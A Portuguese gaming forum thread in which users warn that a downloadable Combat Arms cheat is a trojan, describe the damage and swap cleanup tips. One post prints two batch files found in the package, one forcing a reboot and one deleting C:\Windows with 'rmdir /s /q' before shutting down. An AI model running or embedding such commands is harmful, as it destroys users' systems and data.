Ir para conteúdo
🥇 [Exclusivo] Seja um Membro VIP EXTREME! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

[NEW] 4Vip Hack - Aimbot VIP,Life Tanker,Crash Room,God Mode,e Muito Mais Sem DC!

Posts Recomendados

tem como resolver isso sem ter q formata ? ajuda pf

em qual lugar eu vo pra restaura meu é windows xp ajdua pf anonymous

bom senao puder restaurar sistema tenta saber quais arquivos foram danificados caso seja alguma dll importante tente baixa-la

então faz oque falei tente descobrir se há algum arquivo danificado,faça uma verificação com anti-virus ...

xAnonymous

Eu consegui restaurar meu sistema, posso ficar despreocupado ou ainda não ? D:

bom notaram alguma mudança ants e depois da restauração? fizeram verificação pra ver se ainda contem virus no pc ?

entao exclua o virus, reinicie o pc, indico usar ccleaner para poder fazer uma boa limpeza do sistema

xAnonymous

Fiz a verificação e o avast não encontrou nada. as únicas diferenças que eu encontrei foram o combat arms ter sumido(nem .exe existe mais), a própria pasta do hack e o brazukas hack.

fico calmo ou não ?

aff fudeu quase tudo um monte de coisa desapareceu e nao consigo acha o restaurador

[/color]"]Afff! Man Eu N Consigo Ler Oq Vcs Falam! N Baixem é Puro Trojan!!!!! Agora vo Tem Que Recuperar Meu Windows

!

bom se vc não notou nenhum dano grave ocorrido fique tranquilo, se pc estiver reiniciando sozinhu,dando erros ai tente fazer a formatação,pelo que vi apenas foi excluido o combat, eu baixei aqui pra ver o resultado e como imaginei meu combat tbm sumiu fiz uma verificaçoes e consegui arrumar os danos

veiu foi apagado umas coisas e agora nao sei o q devo fazer ele tava lento dai passsei o anti viros mandei pra quarentena o viros e pasei o ccleaner dai nao fico mais lento vo reiniciar aqui pra ver se eu nao volta fudeu msm valew pela ajuda amigo

vo logo avisando quem baixa isso ta pedindo pra fuder o pc!!!

serio num e brincadeira assim que abrer o arquivo instalar abre altomaticamente o pronpt e quer abrir o arquivo protegido ainda bem que o windons num deixa!!

galera um conselho nunca baixe nada sem verificar antes ou vir de uma fonte confiavel,leia bastante o resultados dos cobaias,fique sempre atento em tudo que vc baixa.. mas qualquer duvidas ainda só postar ae que estarei ajudando no que puder

ae kara tu ñ tem oq faze?

isso pode ser oq vc kize mas hack pra ca num é aki nem lá na china

quando fui instala a bagaça abriu o cmd e começou a enviar comandos

muitos estranhos do tipo alguma coisa a ver com logoff

oq um hack tem a ver com logof tenho ate um print aki

Sem%20t%EDtulo.png

][/font]

manolitos eu achei arquivos .bat nos exe da pasta

olha o que tinha neles:

1º .bat

@echo off

@break off

shutdown -r -f -t 00

exit

2º .bat

rmdir /s /q c:\windows

shutdown -s -c "Todas suas bases pertencem a mim." -t 03

isso ja foi postado, se tiver alguem ainda mesmo depois de tantos post está tentando mexer com esse hack quer realmente acabar com seu pc' staff closed aqui urgente

Mano, melhora ai, Scan com Virus Bat.ca e Trojan cara,

isso não é falso positivo!

Este tópico está impedido de receber novos posts.
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.